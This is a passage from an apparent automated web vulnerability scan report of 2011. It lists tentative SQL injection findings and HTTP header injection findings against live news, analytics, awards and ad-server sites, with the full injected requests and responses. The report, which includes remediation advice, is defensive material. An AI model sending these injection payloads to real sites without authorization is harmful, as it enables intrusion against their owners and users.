Date: Mon, 14 Feb 2011 15:10:46 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
                               <title> | The Des Moines Register | DesMoinesRegister.com
...[SNIP]...
<br>
Scripts: 15ms<br>
Read cache: 16ms<br>

-->

1.24. http://www.desmoinesregister.com/scripts/app/js/jquery-1.3.1.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.desmoinesregister.com
Path:   /scripts/app/js/jquery-1.3.1.min.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/app'%20and%201%3d1--%20/js/jquery-1.3.1.min.js?ver=3.0.4 HTTP/1.1
Host: www.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Last-Modified: Mon, 14 Feb 2011 14:52:28 GMT
X-Processing-begin: MOC-WN0508, on site D2 (2011-02-14 09:52:28:366)
Content-Type: text/html
X-Processing-finished: MOC-WN0508, on site D2 (2011-02-14 09:52:28:412)
Content-Type: text/html; charset=iso-8859-1
Content-Length: 27910
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 14:52:28 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
                               <title> | The Des Moines Register | DesMoinesRegister.com
...[SNIP]...
<!-- Delivery of Cache Page
Time used: 46 ms<br>
<b>Starting first parse</b><br>
.Build 9: 15 ms (Content)<br>
Retrieve categories: 0ms<br>
Read templates: 0ms<br>
Read objects: 0ms<br>
Scripts: 15ms<br>

-->

Request 2

GET /scripts/app'%20and%201%3d2--%20/js/jquery-1.3.1.min.js?ver=3.0.4 HTTP/1.1
Host: www.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Last-Modified: Mon, 14 Feb 2011 14:52:28 GMT
X-Processing-begin: MOC-WN0509, on site D2 (2011-02-14 09:52:28:514)
Content-Type: text/html
X-Processing-finished: MOC-WN0509, on site D2 (2011-02-14 09:52:28:608)
Content-Type: text/html; charset=iso-8859-1
Content-Length: 27923
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 14:52:28 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
                               <title> | The Des Moines Register | DesMoinesRegister.com
...[SNIP]...
<!-- Delivery of Cache Page
Time used: 78 ms Wait: 156 ms<br>
<b>Starting first parse</b><br>
.Build 9: 63 ms (Content)<br>
Retrieve categories: 0ms<br>
Read templates: 0ms<br>
Read objects: 0ms<br>
Scripts: 63ms<br>

-->

1.25. http://www.quantcast.com/global/personalHeader [qcVisitor cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.quantcast.com
Path:   /global/personalHeader

Issue detail

The qcVisitor cookie appears to be vulnerable to SQL injection attacks. The payloads 16652564'%20or%201%3d1--%20 and 16652564'%20or%201%3d2--%20 were each submitted in the qcVisitor cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /global/personalHeader HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10; qcVisitor=2|77|1296918427290|62|NOTSET16652564'%20or%201%3d1--%20; JSESSIONID=6AC4FB85FB2136D92A4B98C360B3137C

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Mon, 14 Feb 2011 01:15:15 GMT
Expires: Sat, 12 Feb 2011 13:15:15 GMT
Cache-control: private, max-age=0
Set-Cookie: qcVisitor=2|77|1296918427290|63|NOTSET16652564; Expires=Wed, 06-Feb-2041 01:15:15 GMT; Path=/
Set-Cookie: JSESSIONID=4DB3BC426F9AB4726E9FD03BE2E8638A; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 934
Connection: close









<span id="header-utility" class="utility">



<ul>
<li class="optout"><a id="searchFormOptOut" href="/opt-out">Opt-Out</a></li>
<li><a href="/privacy" class="privacy">Privacy</a></li>


<li>
<a id="globalNavSignIn" href="/user/login">
Sign In
</a>
</li>

<li class="last">
<a id="globalNavCreateAccount" href="/user/signup">Create Account</a>
</li>
</ul>



</span>
<!-- Mini login module -->




<div id="miniLogin">



<form id="signupLogin" name="userlogin" action="/user/login" method="post">
<table id="signupLoginTable">
<tr>
<td>



<label>Email</label>


<input id="email" name="wpUsername" size="15" class="loginText" type="text" spellcheck="false"/>
</td>
<td>&nbsp;</td>
</tr>
<tr>
<td>



<label>Password</label>


<input id="password" name="wpPassword" class="loginText" type="password" value="" size="15"/>
</td>
<td><input type="submit" class="submit" value="Sign In" /></td>
</tr>
</table>
</form>


</div>



Request 2

GET /global/personalHeader HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10; qcVisitor=2|77|1296918427290|62|NOTSET16652564'%20or%201%3d2--%20; JSESSIONID=6AC4FB85FB2136D92A4B98C360B3137C

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Mon, 14 Feb 2011 01:15:15 GMT
Expires: Sat, 12 Feb 2011 13:15:15 GMT
Cache-control: private, max-age=0
Set-Cookie: qcVisitor=2|77|1296918427290|63|NOTSET16652564; Expires=Wed, 06-Feb-2041 01:15:15 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 934
Connection: close









<span id="header-utility" class="utility">



<ul>
<li class="optout"><a id="searchFormOptOut" href="/opt-out">Opt-Out</a></li>
<li><a href="/privacy" class="privacy">Privacy</a></li>


<li>
<a id="globalNavSignIn" href="/user/login">
Sign In
</a>
</li>

<li class="last">
<a id="globalNavCreateAccount" href="/user/signup">Create Account</a>
</li>
</ul>



</span>
<!-- Mini login module -->




<div id="miniLogin">



<form id="signupLogin" name="userlogin" action="/user/login" method="post">
<table id="signupLoginTable">
<tr>
<td>



<label>Email</label>


<input id="email" name="wpUsername" size="15" class="loginText" type="text" spellcheck="false"/>
</td>
<td>&nbsp;</td>
</tr>
<tr>
<td>



<label>Password</label>


<input id="password" name="wpPassword" class="loginText" type="password" value="" size="15"/>
</td>
<td><input type="submit" class="submit" value="Sign In" /></td>
</tr>
</table>
</form>


</div>




1.26. http://www.webbyawards.com/webbys/current_honorees.php [media_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.webbyawards.com
Path:   /webbys/current_honorees.php

Issue detail

The media_id parameter appears to be vulnerable to SQL injection attacks. The payloads 11757037%20or%201%3d1--%20 and 11757037%20or%201%3d2--%20 were each submitted in the media_id parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /webbys/current_honorees.php?media_id=9611757037%20or%201%3d1--%20&category_id=61&season=13 HTTP/1.1
Host: www.webbyawards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 14:47:43 GMT
Server: Apache
X-Powered-By: PHP/4.3.10
Set-Cookie: PHPSESSID=7b324e13987363266d824018404c2afd; expires=Mon, 21-Feb-2011 14:47:43 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /webbys/current_honorees.php?media_id=9611757037%20or%201%3d2--%20&category_id=61&season=13 HTTP/1.1
Host: www.webbyawards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 14:48:18 GMT
Server: Apache
X-Powered-By: PHP/4.3.10
Set-Cookie: PHPSESSID=dafa34d404b3719f86b4df44da0b03b1; expires=Mon, 21-Feb-2011 14:48:18 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20652




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<title>Webby Honorees</title>

<link href="/css/screen.css" rel="stylesheet" type="text/css" media="screen" />
<!--[if lte IE 7]>
<link href="/css/screen-ie.css" rel="stylesheet" type="text/css" media="screen" />
<![endif]-->

<!--[if lte IE 6]>
<link href="/css/screen-ie6.css" rel="stylesheet" type="text/css" media="screen" />
<![endif]-->



<link rel="shortcut icon" href="/images/favicon.ico" >



<script language="javascript" type="text/javascript" src="/script/rotate_quote.js"></script>
<script language="javascript" type="text/javascript" src="/script/site_globals.js"></script>
<script language="javascript" type="text/javascript" src="/script/swfobject.js"></script>


<style type="text/css">
        #bottom{ display: block; height: 300px; width: 400px; z-index: 10000; }
       </style>
       <script type="text/javascript" src="/takeover/js/swfobject.js"></script>
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.js"></script>
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
       
       <!--for homepage carousel -->
       <script type="text/javascript" src="/index-slider/js/jquery.jcarousel.js"></script>
<script type="text/javascript" src="/index-slider/js/jquery.cycle.all.js"></script>
       <link rel="stylesheet" type="text/css" href="/index-slider/css/skin.css" />
       
       

    <script type="text/javascript">
    var flashvars = {
       };
       var params = {
       };
       var attributes = {
        wmode: "transparent"
       };
    swfobject.embedSWF("/takeover/media/webbys.swf", "myContent", "400", "300", "9.0.0", flashvars, params, attributes);
    $(document).ready(function(){
    $("#close-flash").hide();
    $("#close-flash").de
...[SNIP]...

2. HTTP header injection  previous  next
There are 49 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://ad.doubleclick.net/activity [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5c9c1%0d%0a579cb4ff136 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5c9c1%0d%0a579cb4ff136;dc_pixel_url=resn.bfppixel;dc_seg=111918;ord=9544611894525588? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=794;c=529/16;s=5;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5c9c1
579cb4ff136
;dc_pixel_url=resn.bfppixel;dc_seg=111918;ord=9544611894525588:
Date: Mon, 14 Feb 2011 01:37:44 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://ad.doubleclick.net/ad/N2724.UndertoneNetwork/B4504763.26 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N2724.UndertoneNetwork/B4504763.26

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1e8e4%0d%0a2fefa587c7c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1e8e4%0d%0a2fefa587c7c/N2724.UndertoneNetwork/B4504763.26;sz=160x600;pc=[TPAS_ID];ord=1297647406285? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356659/Bottom-injection-British-girl-watched-U-S-drugs-agents.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1e8e4
2fefa587c7c
/N2724.UndertoneNetwork/B4504763.26;sz=160x600;pc=[TPAS_ID];ord=1297647406285:
Date: Mon, 14 Feb 2011 01:38:05 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.3. http://ad.doubleclick.net/ad/N3867.ContextWeb/B5127624.18 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3867.ContextWeb/B5127624.18

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7d3d7%0d%0acda025163d8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7d3d7%0d%0acda025163d8/N3867.ContextWeb/B5127624.18;sz=1x1;pc=53910;ord=1297647394261 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7d3d7
cda025163d8
/N3867.ContextWeb/B5127624.18;sz=1x1;pc=53910;ord=1297647394261:
Date: Mon, 14 Feb 2011 01:40:09 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.4. http://ad.doubleclick.net/ad/N6457.4298.ADVERTISING.COM/B4840137.15 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N6457.4298.ADVERTISING.COM/B4840137.15

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2ef38%0d%0a0fd2405f6d4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2ef38%0d%0a0fd2405f6d4/N6457.4298.ADVERTISING.COM/B4840137.15;sz=1x1;ord=3034110126? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2ef38
0fd2405f6d4
/N6457.4298.ADVERTISING.COM/B4840137.15;sz=1x1;ord=3034110126:
Date: Mon, 14 Feb 2011 01:40:24 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.5. http://ad.doubleclick.net/ad/cm.dailymail/ron_052010 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/cm.dailymail/ron_052010

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 49ace%0d%0a79cce659e85 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /49ace%0d%0a79cce659e85/cm.dailymail/ron_052010;net=cm;u=,cm-41374895_1297647368,11d765b6a10b1b3,none,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.rdst11-cm.rdst12-cm.polit_h-cm.music_h-cm.sports_h-cm.weath_l-cm.shop_h-cm.tech_h-cm.ent_h-bk.rdst1-mm.aa5-mm.ad1-mm.af1-mm.ai1-mm.al5-mm.am5-mm.ar1-mm.as1-mm.au1-mm.da1-an.51-an.5-ex.32-ex.76-ex.49-dx.16-qc.a;;sz=300x250;contx=none;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.rdst11;btg=cm.rdst12;btg=cm.polit_h;btg=cm.music_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.shop_h;btg=cm.tech_h;btg=cm.ent_h;btg=bk.rdst1;btg=mm.aa5;btg=mm.ad1;btg=mm.af1;btg=mm.ai1;btg=mm.al5;btg=mm.am5;btg=mm.ar1;btg=mm.as1;btg=mm.au1;btg=mm.da1;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=ex.49;btg=dx.16;btg=qc.a;ord=3461791? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/49ace
79cce659e85
/cm.dailymail/ron_052010;net=cm;u=,cm-41374895_1297647368,11d765b6a10b1b3,none,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.rdst11-cm.rdst12-cm.polit_h-cm.music_h-cm.sports_h-cm.weath_l-cm.shop_h-cm.tech_h-cm.ent_h-bk.rdst1-mm.aa5-mm.ad1-mm.af1-m:
Date: Mon, 14 Feb 2011 01:38:04 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.6. http://ad.doubleclick.net/adi/N1558.Media6/B3897970.7 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1558.Media6/B3897970.7

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 547d9%0d%0aaddfa21ea08 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /547d9%0d%0aaddfa21ea08/N1558.Media6/B3897970.7;sz=300x250;click0=http://ad.media6degrees.com/adserv/clk?tId=4071663510365101|cId=3210|cb=1297647330|notifyPort=8080|exId=19|tId=4071663510365101|ec=1|secId=194|price=0.3381000030040741|pubId=562|advId=971|notifyServer=asd147.sd.pl.pvt|spId=27355|adType=iframe|invId=3099|bid=1.61|ctrack=;ord=1297647331695? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=4071663510365101|cb=1297647330|adType=iframe|cId=3210|ec=1|spId=27355|advId=971|exId=19|price=0.3381000030040741|pubId=562|secId=194|invId=3099|notifyServer=asd147.sd.pl.pvt|notifyPort=8080|bid=1.61|srcUrlEnc=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/547d9
addfa21ea08
/N1558.Media6/B3897970.7;sz=300x250;click0=http: //ad.media6degrees.com/adserv/clk
Date: Mon, 14 Feb 2011 01:36:43 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.7. http://ad.doubleclick.net/adi/N2724.Specific_Media/B4323655.35 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2724.Specific_Media/B4323655.35

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8c5f7%0d%0a4e3b8886cbe was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8c5f7%0d%0a4e3b8886cbe/N2724.Specific_Media/B4323655.35;sz=300x250;;id=CY;type=d;data=camry;pc=[TPAS_ID];click=http://ads.specificmedia.com/click/v=5%3Bm=2%3Bl=5434%3Bc=123869%3Bb=785306%3Bp=ui%3DuosDj9Liw_xRTA%3Btr%3DGdDAFShDwEH%3Btm%3D0-0%3Bts=20110213203406%3Bdct=;ord=20110213203406? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=5434;c=123869;b=785306;ts=20110213203406;p=ui%3DuosDj9Liw_xRTA%3Btr%3DGdDAFShDwEH%3Btm%3D0-0;cxt=99002376:2166629-99002135:2165456-99013532:2161575
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8c5f7
4e3b8886cbe
/N2724.Specific_Media/B4323655.35;sz=300x250;;id=CY;type=d;data=camry;pc=[TPAS_ID];click=http: //ads.specificmedia.com/click/v=5;m=2;l=5434;c=123869;b=785306;p=ui=uosDj9Liw_xRTA;tr=GdDAFShDwEH;tm=0-0;ts=20110213203406;dct=;ord=20110213203406
Date: Mon, 14 Feb 2011 01:34:16 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.8. http://ad.doubleclick.net/adi/N3285.usatoday/B2343920.27 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.usatoday/B2343920.27

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 15b01%0d%0a972348252b4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

